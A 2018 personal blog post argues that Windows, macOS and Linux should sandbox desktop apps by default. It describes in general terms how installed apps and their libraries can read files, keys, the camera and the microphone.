When will we get secure desktop OSes?

2018-08-12

PC/Mac using people. We have a problem. That problem is our machines are not remotely secure. 10yrs ago I used to not really worry about it but I feel like the time as come that if something isn't done soon we're all going to lose our data and have our bank accounts stolen etc...

Maybe this comes from working on Chrome where security is taken seriously. That's not to say it's not serious in other places but rather working on Chrome all the ways in which a program can do bad things and how to stop them comes up. Of course a browser runs "untrusted code" by which they mean, unless you shut off JavaScript, every page you visit gets to run code on your machine via JavaScript and/or WebAssembly.

That's awesome IMO. It gives us things like Google Maps which is amazing and things like Google.com/flights which gives instant and live results but it also means browsers have to be vigilant and have to consider how APIs are designed so that a random site's code can't do bad things to your computer.

Sure, some people will read this and rant that browser's shouldn't run code in the first place. I disagree. I think Google Maps is far better with JavaScript than without. But, that's beside the point.

The point is NATIVE APPS HAVE THE SAME PROBLEMS!

The disinction is supposed to be that code in the browser could come from anywhere. The ads on your favorite sites include code to track you. The site itself has code to do whatever (get the latest posts live or send you a message notification). You didn't explicitly say "I trust this code" so it's "untrusted".

That is supposed to be in contrast to apps you install on your computer. The act of choosing to install a native app is implicitly saying "I trust this app".

That is a problem. You shouldn't trust apps. You should haven't to trust apps any more than you should have to trust webpages. Apps can be just as evil as a webpage. In fact apps can be more evil because at the moment they aren't sandboxed on Mac or Windows or Linux so they can do far more damage than a webpage.

An app can, read your entire hard drive or at least all the data in your user folder which is probably where all your important data is anywhere. That means it can look at all your photos, all your movies, read though all your files including whatever finanical files you've saved on your computer. If you're a geek and you have private SSH keys stored in ~/.ssh all those keys can be read by any software you install.

A native app can constantly read your clipboard even when it's not the front app and send that to some server on the net. A native app can turn on your camera or your mic without asking. It can scan your network for other devices, some of which might have known exploits.

And of course a large percentage of apps, especially on Windows but even on Mac, ask for admin perission to install which means they can pretty much do anything they want. Install a key logger and watch all your keys. Install a screen reader and download images of your desktop at anytime. They can look at which apps you're running an report that back to their respective companies. They can report the file names of which videos you're watching. They can monitor your network to see which sites you're accessing, what files you're downloading.

THIS HAS TO STOP!!!

The reason it's this way is basically historical. Before all machines were connected to the internet it just never crossed anyone's mind that these things might be problems. We had say 20-30yrs like that where it was just assumed installed apps were trustworthy. So, we have the issue that if Windows and MacOS and Linux were to switch overnight to prevent apps from doing these things all old software would break. Because of that it's hard to push sandboxing apps as the default.

Both Apple and Microsoft put a step forward on this with their respective app stores. Apps installed from the Mac App Store or the Windows App Store run somewhat sandboxed. Microsoft recently removed that sandbox requirement though as the are shipping their Ubuntu integeration on the Windows App Store and it has access to everything.

In general, I don't think any app should have perminent permission to access your mic or your camera. Even Facetime should be asking for permission each and every time. It wouldn't be that bad of a UX. You'd make a call and the OS would prompt "Facetime would like to use the camera Y/N" and your call would be made.

The problem is once you give an app perission then you never know when it's turning on the mic or the camera. For mobile this might be slightly less of an issue since, at least on iOS, only one app runs at a time so you know some background app can't be using the mic (AFAIK). For desktop that's not true so once you've given an app permission to use the camera you really never know when it will do so. Of course on desktop right now there is no camera permission even if sandboxed. You gave it permission just by the act of installing it. You can see MacOS doesn't even have the option to prevent an app from accessing the mic or the camera.

And, this isn't just an issue of trusting each company. You might trust Slack and install their Slack app. Or you might trust Adobe and install Photoshop but those companies are using 100s of 3rd party libraies. You're really trusting 1000s of people for each piece of software you install. Your trusting all 1000+ people are not trying to do anything bad. That all 1000+ people, every disgruntled employee, every schemey person in the chain, didn't decide to try to sneak in some backdoor.

And, even if they aren't intentionally doing something bad there are still bugs. You install some game like Call of Duty. That game sends data between players. Turns out because of a bug another player can hack the networking on their computer to send your computer bad data through the game. They can then own your machine, read all your data, use your camera, mic, etc, hack your router, infect other machines on your network.

This kind of bug is potentially true of any app that exchanges data between users. Your chat app (slack, irc), your email app, your online games, your social netorking apps (facebook, line, whatsapp), etc... You're trusting there are no bugs. Right now there's an extremely popular app framework called Electron. Lots of famous and not so famous apps use it. And yet It's UNSECURE BY DEFAULT. I'd guess if you're using an app based on Electron and that app communicates with a server then odds are > 50% it's insecure. The app itself might be hard coded to only ever talk to the app company's servers which means some random hacker can't use it to pown your machine easily (though maybe they can when you're on their fake wifi). But, unless all the security adivce is followed then any disgruntaled employee or evil manager could use the path between the company and your computer to use the insecurities to do whatever they want to your machine.

Heck, even without frameworks like Electron, apps auto update and each update could add code to do bad things to your machine. The nice people that started the app might have been replaced with less nice people. The company that made the app might have decided they wanted to do more spying on your machine for marketing purposes so your software that used to be trustworth no longer is.

Sandboxings apps solves, or at least is a step to solving all of those issues. With a good sandbox an app can't read the data or files of other apps (without your permission). With a good sandbox an app can't access the mic or camera. With a good sandbox even if the app has bugs that let other users hack your app they can only affect that app and it's data, not your entire computer and all data. A really good sandbox could even prevent scanning your local network.

Steam recently had an exploit anyone could have used to hack your machine. Sure they fixed it but that's not the lesson that should have been learned. The lesson should have been that Steam should never have been in a position to exploit your entire machine. It should be running in a sandbox!

People, in particular software developers, rebel at the idea of sandboxing their software. This is especially frustrating because they should be able to see the dangers. Dev software itself has this issue. Many devs install software almost daily. They download software libraries as packages or as git repositories and trust those libraires are not owning their machines or spying on them. Seriously, typing npm install pick-your-favorite-lib is like literally trusting 100s if not 1000s of people you've never met not to trash your computer and or steal your data. Being told to type apt get some-package and or brew install package should not be opening your data to getting stolen. There needs to be a better way to sandbox even command line apps.

One way to solve this is to create a new VM for every project but at the moment that's too burdensome so that almost no one does it. Microsoft is apparently adding a feature to do this but it doesn't sound like a serious solution. It's only for temporarily running some software. It's not for putting each app in its own sandbox.

Another solution is to run a more sandboxed os like Qubes OS. Unfortunately the apps people want to run are generally not availabe on Qubes so that isn't really a solution. Apple and Micrsoft are really the two companies that need to lead the fix for this.

Unfortunately their current solutions so far are broken. First off their new sandboxes are optional. You can stlll install software that runs outside the sandbox and because of that that's still the norm to install un-sandboxed software. Probably 95% of all the software installed in both OSes runs un-sandboxed. All games on steam and pretty much all brand name apps run unsandboxed.

Secondly their desktop sandboxes are leaky. See the fact that the camera and mic are not sandboxed yet.

And, finally and most important is they've conflated sandboxing with their store. Getting apps from an offical store should be separated from sandboxing apps. Any app, regardless of how it's installed should be subject to sandboxing restrictions by default. You shouldn't have to only get store apps to be sandboxed. The OS should be designed to be safe by default.

I'm sure you can think of an exception, some software that can't function in a sandbox and that's mostly fine but that should be the exception and Apple and Microsoft and users at large should shame and boycott any software that tries to avoid sandboxing. This includes companies like Adobe that are known for hacking your OS at a deep level to spy on you.

I'm not holding my breath and I'm sure I'll get some rants about sandboxing in the comments. I've even seen arguments that sandboxing isn't a solution. To that argument I'd argue back that if you believe sandboxing is not a solution then you should be fine to run your browser with sandboxing off and you should be fine running all software as root/admin. If you aren't willing to that then you do actually believe sandboxing has an important role to play in protecting your computer.

At some point I expect the exploits to multiply like crazy. I'll bet the majority of multi player games have exploits. I'll bet lots of apps that have semi constant networking have exploits. I'll bet that more and more desktop apps will be caught spying on you in one way or another. And I'll bet this will get worse and worse over the years until it becomes clear we need sandboxes. I think iOS and Android have already shown how important they are. Desktop PCs are no different.

Let's hope Microsoft and Apple make better sandboxes. Let's also hope they separate them from their stores and from their certification systems. Sandboxes should be the default.

Comments
Thoughts on Magic Ink
Could ImGUI be the future of GUIs?